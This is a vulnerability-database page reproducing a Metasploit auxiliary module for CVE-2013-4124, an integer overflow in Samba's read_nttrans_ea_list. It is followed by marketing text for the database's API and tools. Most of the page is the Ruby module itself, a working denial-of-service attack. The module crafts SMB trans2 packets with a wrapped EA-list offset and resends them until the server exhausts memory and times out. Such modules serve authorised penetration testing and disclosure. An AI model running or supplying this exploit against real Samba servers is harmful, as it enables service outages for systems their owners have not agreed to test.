Lucene search
+L

Samba read_nttrans_ea_list Integer Overflow

🗓️ 28 Aug 2013 20:11:34Reported by Jeremy Allison, dz_lnlyType 
metasploit
 metasploit
🔗 www.rapid7.com👁 98 Views

Samba read_nttrans_ea_list Integer Overflow, remote attackers can cause a denial of service via an integer overflow in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before 4.0.8

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/struct2'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client::Authenticated

  TRANS2_PARAM = Rex::Struct2::CStructTemplate.new(
    [ 'uint16v', 'FID',       0 ],
    [ 'uint16v', 'InfoLevel', 0 ],
    [ 'uint16v', 'Reserved',  0 ],
  )

  FEA_LIST = Rex::Struct2::CStructTemplate.new(
    [ 'uint32v', 'NextOffset', 0  ],
    [ 'uint8',   'Flags',      0  ],
    [ 'uint8',   'NameLen',    0  ],
    [ 'uint16v', 'ValueLen',   0  ],
    [ 'string',  'Name', nil,  '' ],
    [ 'string',  'Value', nil, '' ]
  )

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Samba read_nttrans_ea_list Integer Overflow',
      'Description' => %q{
        Integer overflow in the read_nttrans_ea_list function in nttrans.c in
        smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before
        4.0.8 allows remote attackers to cause a denial of service (memory
        consumption) via a malformed packet. Important Note: in order to work,
        the "ea support" option on the target share must be enabled.
      },
      'Author'      =>
        [
          'Jeremy Allison', # Vulnerability discovery
          'dz_lnly'         # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['OSVDB', '95969'],
          ['BID', '61597'],
          ['EDB', '27778'],
          ['CVE', '2013-4124']
        ],
      ))

    register_options(
      [
        OptString.new('SMBShare', [true, 'Target share', '']),
        OptInt.new('MsgLen', [true, 'How soon a memory get exhausted depends on the length of that attribute', 1500]),
        OptInt.new('Tries', [true, 'Number of DOS tries', 40]),
      ])

    deregister_options('SMB::ProtocolVersion')
  end

  def get_fid
    ok = self.simple.client.create("/")
    return ok['Payload'].v['FileID']
  end

  def mk_items_payload
    item1 = FEA_LIST.make_struct
    item1.v['ValueLen'] = datastore['MsgLen']
    item1.v['Value'] = "\x00" * datastore['MsgLen']
    item1.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
    item1.v['NameLen'] = item1.v['Name'].length
    item2 = FEA_LIST.make_struct
    item2.v['ValueLen'] = datastore['MsgLen']
    item2.v['Value'] = "\x00" * datastore['MsgLen']
    item2.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
    item2.v['NameLen'] = item1.v['Name'].length
    item3 = FEA_LIST.make_struct # Some padding
    item3.v['ValueLen'] = 4
    item3.v['Value'] = "\x00\x00\x00\x00"
    item3.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
    item3.v['NameLen'] = item1.v['Name'].length

    ilen = item1.to_s.length
    item1.v['NextOffset'] = ilen
    # Wrap offset to 0x00
    item2.v['NextOffset'] = 0xffffffff - ilen + 1
    return item1.to_s + item2.to_s + item3.to_s
  end

  def send_pkt
    fid = get_fid

    trans = TRANS2_PARAM.make_struct
    trans.v['FID'] = fid
    trans.v['InfoLevel'] = 1015 # SMB_FILE_FULL_EA_INFORMATION
    data = mk_items_payload
    subcmd = 0x08
    self.simple.client.trans2(subcmd, trans.to_s, data.to_s, false)
  end

  def run
    print_status("Trying a max of #{datastore['Tries']} times...")
    datastore['Tries'].times do
      connect(versions: [1])
      smb_login()
      self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

      print_status('Sending malicious package...')
      send_pkt

      begin
        self.simple.client.create("")
        print_error('Server Answered, DoS unsuccessful')
      rescue Timeout::Error
        print_good('Server timed out, this is expected')
        return
      rescue Rex::Proto::SMB::Exceptions::InvalidType
        print_error('Server Answered, DoS unsuccessful')
      end
      disconnect()
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation